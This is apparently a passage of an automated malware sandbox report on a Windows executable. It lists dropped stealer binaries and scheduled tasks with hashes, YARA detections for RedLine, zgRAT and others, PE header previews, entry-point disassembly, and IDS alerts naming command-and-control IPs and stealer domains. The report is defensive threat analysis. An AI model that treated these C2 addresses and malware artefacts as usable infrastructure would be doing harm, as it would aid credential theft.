Yara Hits:	Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Users\user\AppData\Roaming\CZjRdKVnFB.exe, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Users\user\AppData\Roaming\CZjRdKVnFB.exe, Author: Joe Security Rule: MALWARE_Win_zgRAT, Description: Detects zgRAT, Source: C:\Users\user\AppData\Roaming\CZjRdKVnFB.exe, Author: ditekSHen
Antivirus:	Antivirus: ReversingLabs, Detection: 92%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...A/................0..,...R......^J... ...`....@.. ....................................@..................................J..K....`...O........................................................................... ............... ..H............text...d... ...,.................. ..`.rsrc....O...`...P..................@..@.reloc...............~..............@..B................@J......H.......\|Z...x......<...X....)..............................................(....*..0...........s........~....%:....&~......!...s....%.....(...+o.....8[....o...............%..F~s...(.....%..G~s...(.....%..H~s...(.....%..e~s...(.....~t...(.......o......8......(......s.......sK.......~....}....~...........s....(....o....}......{.....I~s...(....o........9......I~s...(.......8C........~s...(....o....:......{....~u...(....8......{....~v...(.........(...........9........o........(

C:\Users\user\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-2246122658-3693405117-2476756634-1003\76b53b3ec448f7ccdda2063b15d2bfc3_9e146be9-c76a-4720-bcdb-53011b87bd06

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	data
Category:	dropped
Size (bytes):	2251
Entropy (8bit):	7.645826061435262
Encrypted:	false
SSDEEP:
MD5:	72E73B01D41E53476B4B7C574E1EAC04
SHA1:	D79AE7CE124A436E3F86390FD3A4F442BD45FAB0
SHA-256:	68D6A98B2AE3519B7D3EA7C26F35A82D5DCA00E37B1979E4ED47836333A6E30B
SHA-512:	05ADD38223F9FF313887B061B82AC15074BA3BDBD36C2B5C339900225D60E352B1F2E2E397C5B3B9D5B300DD7BB3F68BE4D9DF2A3D9DE58BF095EA64FD6374BA
Malicious:	false
Reputation:	unknown
Preview:	........'...............P...............{41744BE4-11C5-494C-A213-BA0CE944938E}.....................RSA1..................v..XU~l2_.......vj....b.... ..&...X.Y...=q...).....`.1.0..~......5DL. ..S>.......<..y...?YOA.... eb.QD..B..<.!..'J..+.'...4fu.z./....]@.y.b...o...).j'......0}B.j..R..-..2.....'=...@....s....;. .v=..;...\$...G....2S....al.ZQ.Q...w...aXzW.....................z..O........b.aZA.....`.....,...C.r.y.p.t.o.A.P.I. .P.r.i.v.a.t.e. .K.e.y....f...... .......@.........[.f..d..]....1...W............ ........W......Z`...k...6..5.\|..}P...c.68.IB..a....h.....p.,.N%..T?ss..i^.h....?...@B.e.P@....^...........].>.j6...n..'..t...5.7e.2...a...d..3.f.#,........w..d.....a.{........VI2.F..b/,..$^.-.g&t.S-....s....T.B.(......+p-..!..Dr...N<..{n...,........C..@....../.....te..g....Qj....F........EN.W.....:Y.......K4.K...p....&g..Fk..n...z6}.EH.A.{)..m5.......R..&...o.._-.N2..Y.E.?.K..-B...+.........Un].....5..n...w*..l..m....>.i?L.]Q......;..r,.%...-.o

C:\Users\user\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-2246122658-3693405117-2476756634-1003\eea1aa6eb7cbc6264734f2310e28d803_9e146be9-c76a-4720-bcdb-53011b87bd06

Download File

Process:	C:\Users\user\AppData\Roaming\rHCHrI9F0v.exe
File Type:	data
Category:	dropped
Size (bytes):	2251
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:
MD5:	0158FE9CEAD91D1B027B795984737614
SHA1:	B41A11F909A7BDF1115088790A5680AC4E23031B
SHA-256:	513257326E783A862909A2A0F0941D6FF899C403E104FBD1DBC10443C41D9F9A
SHA-512:	C48A55CC7A92CEFCEFE5FB2382CCD8EF651FC8E0885E88A256CD2F5D83B824B7D910F755180B29ECCB54D9361D6AF82F9CC741BD7E6752122949B657DA973676
Malicious:	false
Reputation:	unknown
Preview:	........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\cookies.sqlite-shm

Download File

Process:	C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe
File Type:	data
Category:	dropped
Size (bytes):	32768
Entropy (8bit):	0.017262956703125623
Encrypted:	false
SSDEEP:
MD5:	B7C14EC6110FA820CA6B65F5AEC85911
SHA1:	608EEB7488042453C9CA40F7E1398FC1A270F3F4
SHA-256:	FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
SHA-512:	D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
Malicious:	false
Reputation:	unknown
Preview:	..-.....................................8...5.....-.....................................8...5...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\places.sqlite-shm

Download File

Process:	C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe
File Type:	data
Category:	dropped
Size (bytes):	32768
Entropy (8bit):	0.017262956703125623
Encrypted:	false
SSDEEP:
MD5:	B7C14EC6110FA820CA6B65F5AEC85911
SHA1:	608EEB7488042453C9CA40F7E1398FC1A270F3F4
SHA-256:	FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
SHA-512:	D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
Malicious:	false
Reputation:	unknown
Preview:	..-.....................................8...5.....-.....................................8...5...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\rHCHrI9F0v.exe

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	311296
Entropy (8bit):	5.082156492931411
Encrypted:	false
SSDEEP:
MD5:	30F46F4476CDC27691C7FDAD1C255037
SHA1:	B53415AF5D01F8500881C06867A49A5825172E36
SHA-256:	3A8F5F6951DAD3BA415B23B35422D3C93F865146DA3CCF7849B75806E0B67CE0
SHA-512:	271AADB524E94ED1019656868A133C9E490CC6F8E4608C8A41C29EFF7C12DE972895A01F171E8F625D07994FF3B723BB308D362266F96CB20DFF82689454C78F
Malicious:	true
Yara Hits:	Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: C:\Users\user\AppData\Roaming\rHCHrI9F0v.exe, Author: Joe Security
Antivirus:	Antivirus: ReversingLabs, Detection: 92%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...d.9...............0................. ... ....@.. ....................... ............@.................................t...O.... ..............................X................................................ ............... ..H............text........ ...................... ..`.rsrc........ ......................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\Pictures\Lighter Tech\runtime.exe

Download File

Process:	C:\Windows\System32\cmd.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	45056
Entropy (8bit):	6.216673519026734
Encrypted:	false
SSDEEP:
MD5:	B73CF29C0EA647C353E4771F0697C41F
SHA1:	3E5339B80DCFBDC80D946FC630C657654EF58DE7
SHA-256:	EDD76F144BBDBFC060F7CB7E19863F89EB55863EFC1A913561D812083B6306CD
SHA-512:	2274D4C1E0EF72DC7E73B977E315DDD5472EC35A52E3449B1F6B87336EE18FF8966FED0451D19D24293FDE101E0C231A3CAA08B7BD0047A18A41466C2525E2E8
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 58%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....I..........."...0.................. ........@.. ....................... ............@.................................:...O.......................................8............................................ ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B................n.......H........1..............xJ.. y............................................~....}.....~....}.....~....}.....(.....(......{....t....}....6..s....(.......0..>........{....r...po...........o....&..{........(....(....}.....(.......0..!.........{........(....(....}.....(........0..!.........{........(....(....}.....(........0..!.........{........(....(....}.....(........0..!.........{........(....(....}.....(........0..!.........{........(....(....}.....(........0..!.......

C:\Windows\Tasks\Hkbsse.job

Download File

Process:	C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe
File Type:	data
Category:	dropped
Size (bytes):	290
Entropy (8bit):	3.4722070391129085
Encrypted:	false
SSDEEP:
MD5:	A0ACF0DE210268CDDFF11E479D906813
SHA1:	89781EF6155F409C17C9CB48E9B059436EF8D1C3
SHA-256:	26CFEE7F5EF8FB085B9412DF98A369802C7031DBE4BB1176D02552CD16237931
SHA-512:	D51AC5019F8C903B40D4A628E9C34F11575AC4F1FF97A71C552E764A494C245EFE4AF8FD96F15BE5E99AEA236CDE902A4DC6E305FC757C2F4D858ECACC679A93
Malicious:	false
Reputation:	unknown
Preview:	...../....^M...j...]F.......<... .....s.......... ....................9.C.:.\.U.s.e.r.s.\.h.u.b.e.r.t.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p.\.0.5.4.f.d.c.5.f.7.0.\.H.k.b.s.s.e...e.x.e.........H.U.B.E.R.T.-.P.C.\.h.u.b.e.r.t...................0...................@3P.........................

C:\Windows\Tasks\axplong.job

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	data
Category:	dropped
Size (bytes):	292
Entropy (8bit):	3.449368772747722
Encrypted:	false
SSDEEP:
MD5:	60C0DBCBCF91D2D7B60A752DE95BFA0C
SHA1:	C0B749B780169E1B9EC2B6F9FBECC9B7C6F23FDE
SHA-256:	B2DA623717A58EE73C9B43064199084A23038E8A00E31F56CC0A591281B024A3
SHA-512:	A24E5D8574C921DF50E2D253589AB8390DAED499D70A8325BC3F05773A43F9B2EABBFBAB9333929D3F5AB5A83C43FBD4FE60C368C95C1292834BC2C2719ED165
Malicious:	false
Reputation:	unknown
Preview:	.....+.z..<O.+Q..#..F.......<... .....s.......... ....................:.C.:.\.U.s.e.r.s.\.h.u.b.e.r.t.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p.\.4.4.1.1.1.d.b.c.4.9.\.a.x.p.l.o.n.g...e.x.e.........H.U.B.E.R.T.-.P.C.\.h.u.b.e.r.t...................0...................@3P.........................

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.95490263397455
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	file.exe
File size:	1'934'336 bytes
MD5:	884cdb86a958ae71754d1ba5c04a4f11
SHA1:	3a52a15bdcd7d291b2ceb4d173a774ebc587963e
SHA256:	ff02bcdde4dacb915cc3aefde1936bf0a17e08954982d90157c78cce10c5e225
SHA512:	5f8f3cf448dcd811830de618e007eb824ac6bd8069bba262e957d9a30525e6e31e8f06da0fd1240b2d8653219eda477285319dd2041f2cccf78027374a8c8b6b
SSDEEP:	49152:aA8LY0hk13QWLUf3ai8EAQzpYAqULN6MNZ:30hY3QWLU3aEACPqUB9
TLSH:	59953358314FDB35C0A3A87ABC122E74416536C0B3E4852F7DB2DB7025E61FE76C998A
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........PJ.r>..r>..r>...=..r>...;.(r>.].:..r>.].=..r>.].;..r>...:..r>...?..r>..r?.^r>...7..r>......r>...<..r>.Rich.r>................

File Icon


Icon Hash:	00928e8e8686b000

Static PE Info

General

Entrypoint:	0x8ce000
Entrypoint Section:	.taggant
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, TERMINAL_SERVER_AWARE
Time Stamp:	0x66A240BE [Thu Jul 25 12:10:38 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	6
OS Version Minor:	0
File Version Major:	6
File Version Minor:	0
Subsystem Version Major:	6
Subsystem Version Minor:	0
Import Hash:	2eabe9054cad5152567f0699947a2c5b

Entrypoint Preview

Instruction
jmp 00007F4540EE6F7Ah
punpckldq mm3, qword ptr [00000000h]
add cl, ch
add byte ptr [eax], ah
add byte ptr [eax], al
inc ecx
push bx
dec esi
dec ebp
das
xor al, 36h
dec edi
bound ecx, dword ptr [ecx+4Ah]
dec edx
insd
push edi
dec eax
dec eax
jbe 00007F4540EE6FE2h
push esi
dec edx
popad
je 00007F4540EE6FDBh
push edx
dec esi
jc 00007F4540EE6FEAh
cmp byte ptr [ebx], dh
push edx
jns 00007F4540EE6FB7h
or eax, 49674B0Ah
cmp byte ptr [edi+43h], dl
jnc 00007F4540EE6FBDh
bound eax, dword ptr [ecx+30h]
pop edx
inc edi
push esp
push 43473163h
aaa
push edi
dec esi
xor ebp, dword ptr [ebx+59h]
push edi
push edx
pop eax
je 00007F4540EE6FC7h
xor dl, byte ptr [ebx+2Bh]
popad
jne 00007F4540EE6FBCh
dec eax
dec ebp
jo 00007F4540EE6FB3h
xor dword ptr [edi], esi
inc esp
dec edx
dec ebp
jns 00007F4540EE6FC0h
insd
jnc 00007F4540EE6FE0h
aaa
inc esp
inc ecx
inc ebx
xor dl, byte ptr [ecx+4Bh]
inc edx
inc esp
bound esi, dword ptr [ebx]
or eax, 63656B0Ah
jno 00007F4540EE6FC8h
push edx
insb
js 00007F4540EE6FE1h
outsb
inc ecx
jno 00007F4540EE6FC2h
push ebp
inc esi
pop edx
xor eax, dword ptr [ebx+36h]
push eax
aaa
imul edx, dword ptr [ebx+58h], 4Eh
aaa
inc ebx
jbe 00007F4540EE6FBCh
dec ebx
js 00007F4540EE6FB3h
jne 00007F4540EE6FA1h
push esp
inc bp
outsb
inc edx
popad
dec ebx
insd
dec ebp
inc edi
xor dword ptr [ecx+36h], esp
push 0000004Bh
sub eax, dword ptr [ebp+33h]
jp 00007F4540EE6FCCh
dec edx
xor bh, byte ptr [edx+56h]
bound eax, dword ptr [edi+66h]
jbe 00007F4540EE6FAAh
dec eax
or eax, 506C720Ah
aaa
xor dword ptr fs:[ebp+62h], ecx
arpl word ptr [esi], si
inc esp
jo 00007F4540EE6FE3h

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x6a057	0x6b	.idata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x69000	0x1e0	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x4cc570	0x10	afdpsowp
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x4cc520	0x18	afdpsowp
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
	0x1000	0x68000	0x2de00	e001009daa5de560a297d583efb94160	False	0.9972219856948229	data	7.980499909171349	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x69000	0x1e0	0x200	a0455e3e9141abc7d15ffc0f727f9209	False	0.580078125	data	4.451494088989399	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata	0x6a000	0x1000	0x200	cc76e3822efdc911f469a3e3cc9ce9fe	False	0.1484375	data	1.0428145631430756	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
	0x6b000	0x2bb000	0x200	701ec3a14e2f521de67b46611c368451	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
afdpsowp	0x326000	0x1a7000	0x1a6800	6227e62cfa9578c9d4194d186ac5c441	False	0.9943810096153847	data	7.954143997411937	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
loqpciws	0x4cd000	0x1000	0x600	328c3134a0f42f0d58ca779e35fde37b	False	0.5625	data	4.865514221351392	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.taggant	0x4ce000	0x3000	0x2200	093e8f656f4e898878a9a14706bb2573	False	0.39659926470588236	DOS executable (COM)	4.232418534480683	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_MANIFEST	0x4cc580	0x17d	XML 1.0 document, ASCII text, with CRLF line terminators	English	United States	0.5931758530183727

Imports

DLL	Import
kernel32.dll	lstrcpy

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Suricata IDS Alerts

Timestamp	Protocol	SID	Signature	Severity	Source Port	Dest Port	Source IP	Dest IP
2024-09-03T17:13:20.004053+0200	TCP	2043231	ET MALWARE Redline Stealer TCP CnC Activity	1	49722	45580	192.168.2.8	65.21.18.51
2024-09-03T17:13:24.624655+0200	TCP	2043231	ET MALWARE Redline Stealer TCP CnC Activity	1	49722	45580	192.168.2.8	65.21.18.51
2024-09-03T17:13:31.349309+0200	TCP	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	3	49726	80	192.168.2.8	185.215.113.17
2024-09-03T17:13:50.165805+0200	TCP	2044696	ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2	1	49766	80	192.168.2.8	185.215.113.16
2024-09-03T17:13:19.779361+0200	TCP	2043231	ET MALWARE Redline Stealer TCP CnC Activity	1	49722	45580	192.168.2.8	65.21.18.51
2024-09-03T17:13:19.359563+0200	TCP	2043231	ET MALWARE Redline Stealer TCP CnC Activity	1	49714	26212	192.168.2.8	95.179.250.45
2024-09-03T17:13:38.144541+0200	TCP	2044246	ET MALWARE Win32/Stealc Requesting plugins Config from C2	1	49751	80	192.168.2.8	91.202.233.158
2024-09-03T17:14:07.068317+0200	TCP	2044597	ET MALWARE Amadey Bot Activity (POST) M1	1	49803	80	192.168.2.8	185.215.113.19
2024-09-03T17:13:04.391758+0200	TCP	2856122	ETPRO MALWARE Amadey CnC Response M1	1	80	49711	185.215.113.16	192.168.2.8
2024-09-03T17:13:37.912517+0200	TCP	2044245	ET MALWARE Win32/Stealc Active C2 Responding with browsers Config	1	80	49751	91.202.233.158	192.168.2.8
2024-09-03T17:13:25.595652+0200	TCP	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	3	49726	80	192.168.2.8	185.215.113.17
2024-09-03T17:13:14.714914+0200	TCP	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	49723	80	192.168.2.8	185.215.113.16
2024-09-03T17:13:52.333567+0200	TCP	2044696	ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2	1	49768	80	192.168.2.8	185.215.113.16
2024-09-03T17:13:14.025227+0200	TCP	2043231	ET MALWARE Redline Stealer TCP CnC Activity	1	49714	26212	192.168.2.8	95.179.250.45
2024-09-03T17:14:24.626398+0200	TCP	2043231	ET MALWARE Redline Stealer TCP CnC Activity	1	49816	45580	192.168.2.8	65.21.18.51
2024-09-03T17:14:36.916046+0200	TCP	2055489	ET MALWARE Lumma Stealer Domain in TLS SNI (locatedblsoqp .shop)	1	49852	443	192.168.2.8	188.114.96.3
2024-09-03T17:13:47.381492+0200	TCP	2044696	ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2	1	49760	80	192.168.2.8	185.215.113.16
2024-09-03T17:13:19.512267+0200	TCP	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	3	49726	80	192.168.2.8	185.215.113.17
2024-09-03T17:13:27.864791+0200	TCP	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	3	49726	80	192.168.2.8	185.215.113.17
2024-09-03T17:13:48.085866+0200	TCP	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	49762	80	192.168.2.8	52.212.52.84
2024-09-03T17:13:14.030291+0200	TCP	2046056	ET MALWARE Redline Stealer/MetaStealer Family Activity (Response)	1	26212	49714	95.179.250.45	192.168.2.8
2024-09-03T17:13:15.162627+0200	TCP	2043231	ET MALWARE Redline Stealer TCP CnC Activity	1	49714	26212	192.168.2.8	95.179.250.45
2024-09-03T17:12:11.450558+0200	TCP	2043231	ET MALWARE Redline Stealer TCP CnC Activity	1	49816	45580	192.168.2.8	65.21.18.51
2024-09-03T17:14:02.563308+0200	TCP	2049836	ET MALWARE Lumma Stealer Related Activity	1	49788	443	192.168.2.8	188.114.97.3
2024-09-03T17:14:02.563308+0200	TCP	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	49788	443	192.168.2.8	188.114.97.3
2024-09-03T17:13:21.998528+0200	TCP	2043231	ET MALWARE Redline Stealer TCP CnC Activity	1	49722	45580	192.168.2.8	65.21.18.51
2024-09-03T17:13:38.155125+0200	TCP	2044247	ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config	1	80	49751	91.202.233.158	192.168.2.8
2024-09-03T17:14:22.729846+0200	TCP	2055489	ET MALWARE Lumma Stealer Domain in TLS SNI (locatedblsoqp .shop)	1	49841	443	192.168.2.8	188.114.96.3
2024-09-03T17:13:57.022617+0200	TCP	2044597	ET MALWARE Amadey Bot Activity (POST) M1	1	49780	80	192.168.2.8	185.215.113.19
2024-09-03T17:14:13.627302+0200	TCP	2044597	ET MALWARE Amadey Bot Activity (POST) M1	1	49817	80	192.168.2.8	185.215.113.19
2024-09-03T17:13:13.166755+0200	TCP	2043234	ET MALWARE Redline Stealer TCP CnC - Id1Response	1	45580	49722	65.21.18.51	192.168.2.8
2024-09-03T17:14:13.205044+0200	TCP	2043231	ET MALWARE Redline Stealer TCP CnC Activity	1	49816	45580	192.168.2.8	65.21.18.51
2024-09-03T17:14:13.205044+0200	TCP	2046045	ET MALWARE [ANY.RUN] RedLine Stealer/MetaStealer Family Related (MC-NMF Authorization)	1	49816	45580	192.168.2.8	65.21.18.51
2024-09-03T17:14:13.431001+0200	TCP	2043234	ET MALWARE Redline Stealer TCP CnC - Id1Response	1	45580	49816	65.21.18.51	192.168.2.8
2024-09-03T17:13:17.828335+0200	TCP	2044245	ET MALWARE Win32/Stealc Active C2 Responding with browsers Config	1	80	49726	185.215.113.17	192.168.2.8
2024-09-03T17:13:25.107366+0200	TCP	2043231	ET MALWARE Redline Stealer TCP CnC Activity	1	49722	45580	192.168.2.8	65.21.18.51
2024-09-03T17:14:23.694054+0200	TCP	2044597	ET MALWARE Amadey Bot Activity (POST) M1	1	49845	80	192.168.2.8	185.215.113.19
2024-09-03T17:13:18.317412+0200	TCP	2043231	ET MALWARE Redline Stealer TCP CnC Activity	1	49714	26212	192.168.2.8	95.179.250.45
2024-09-03T17:13:26.708215+0200	TCP	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	49740	80	192.168.2.8	52.212.52.84
2024-09-03T17:13:20.150220+0200	TCP	2043231	ET MALWARE Redline Stealer TCP CnC Activity	1	49714	26212	192.168.2.8	95.179.250.45
2024-09-03T17:13:50.423527+0200	TCP	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	49766	80	192.168.2.8	185.215.113.16
2024-09-03T17:14:16.583875+0200	TCP	2044597	ET MALWARE Amadey Bot Activity (POST) M1	1	49826	80	192.168.2.8	185.215.113.19
2024-09-03T17:13:14.935679+0200	TCP	2043231	ET MALWARE Redline Stealer TCP CnC Activity	1	49714	26212	192.168.2.8	95.179.250.45
2024-09-03T17:13:16.233819+0200	TCP	2043231	ET MALWARE Redline Stealer TCP CnC Activity	1	49714	26212	192.168.2.8	95.179.250.45
2024-09-03T17:13:19.959994+0200	TCP	2043231	ET MALWARE Redline Stealer TCP CnC Activity	1	49714	26212	192.168.2.8	95.179.250.45
2024-09-03T17:13:22.685429+0200	TCP	2043231	ET MALWARE Redline Stealer TCP CnC Activity	1	49722	45580	192.168.2.8	65.21.18.51
2024-09-03T17:13:05.130606+0200	TCP	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	49712	80	192.168.2.8	52.212.52.84
2024-09-03T17:14:00.909905+0200	UDP	2055480	ET MALWARE Lumma Stealer Domain in DNS Lookup (millyscroqwp .shop)	1	62967	53	192.168.2.8	1.1.1.1
2024-09-03T17:14:06.106058+0200	TCP	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	49798	443	192.168.2.8	176.9.8.206
2024-09-03T17:13:08.410750+0200	TCP	2043231	ET MALWARE Redline Stealer TCP CnC Activity	1	49714	26212	192.168.2.8	95.179.250.45
2024-09-03T17:13:08.410750+0200	TCP	2046045	ET MALWARE [ANY.RUN] RedLine Stealer/MetaStealer Family Related (MC-NMF Authorization)	1	49714	26212	192.168.2.8	95.179.250.45
2024-09-03T17:13:24.401213+0200	TCP	2043231	ET MALWARE Redline Stealer TCP CnC Activity	1	49722	45580	192.168.2.8	65.21.18.51
2024-09-03T17:13:20.291700+0200	TCP	2043231	ET MALWARE Redline Stealer TCP CnC Activity	1	49722	45580	192.168.2.8	65.21.18.51
2024-09-03T17:14:35.678210+0200	TCP	2055490	ET MALWARE Lumma Stealer Domain in TLS SNI (millyscroqwp .shop)	1	49851	443	192.168.2.8	188.114.97.3
2024-09-03T17:13:17.070132+0200	TCP	2043231	ET MALWARE Redline Stealer TCP CnC Activity	1	49714	26212	192.168.2.8	95.179.250.45
2024-09-03T17:13:15.570789+0200	TCP	2043231	ET MALWARE Redline Stealer TCP CnC Activity	1	49714	26212	192.168.2.8	95.179.250.45
2024-09-03T17:13:23.081293+0200	TCP	2043231	ET MALWARE Redline Stealer TCP CnC Activity	1	49722	45580	192.168.2.8	65.21.18.51
2024-09-03T17:13:56.472805+0200	TCP	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	49778	80	192.168.2.8	103.130.147.211
2024-09-03T17:13:19.280283+0200	TCP	2043231	ET MALWARE Redline Stealer TCP CnC Activity	1	49722	45580	192.168.2.8	65.21.18.51
2024-09-03T17:13:19.159086+0200	TCP	2043231	ET MALWARE Redline Stealer TCP CnC Activity	1	49714	26212	192.168.2.8	95.179.250.45
2024-09-03T17:13:19.051519+0200	TCP	2043231	ET MALWARE Redline Stealer TCP CnC Activity	1	49722	45580	192.168.2.8	65.21.18.51
2024-09-03T17:13:22.453138+0200	TCP	2043231	ET MALWARE Redline Stealer TCP CnC Activity	1	49722	45580	192.168.2.8	65.21.18.51
2024-09-03T17:14:18.977555+0200	TCP	2043231	ET MALWARE Redline Stealer TCP CnC Activity	1	49816	45580	192.168.2.8	65.21.18.51
2024-09-03T17:14:04.991480+0200	TCP	2049836	ET MALWARE Lumma Stealer Related Activity	1	49794	443	192.168.2.8	188.114.96.3
2024-09-03T17:14:04.991480+0200	TCP	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	49794	443	192.168.2.8	188.114.96.3
2024-09-03T17:13:53.632054+0200	TCP	2054350	ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4	1	49764	80	192.168.2.8	195.133.48.136
2024-09-03T17:13:21.773602+0200	TCP	2043231	ET MALWARE Redline Stealer TCP CnC Activity	1	49722	45580	192.168.2.8	65.21.18.51
2024-09-03T17:13:17.066811+0200	TCP	2044696	ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2	1	49728	80	192.168.2.8	185.215.113.16
2024-09-03T17:13:16.522593+0200	TCP	2043231	ET MALWARE Redline Stealer TCP CnC Activity	1	49714	26212	192.168.2.8	95.179.250.45
2024-09-03T17:13:17.551303+0200	TCP	2044243	ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in	1	49726	80	192.168.2.8	185.215.113.17
2024-09-03T17:13:16.827619+0200	TCP	2043231	ET MALWARE Redline Stealer TCP CnC Activity	1	49714	26212	192.168.2.8	95.179.250.45
2024-09-03T17:13:18.227936+0200	TCP	2043231	ET MALWARE Redline Stealer TCP CnC Activity	1	49722	45580	192.168.2.8	65.21.18.51
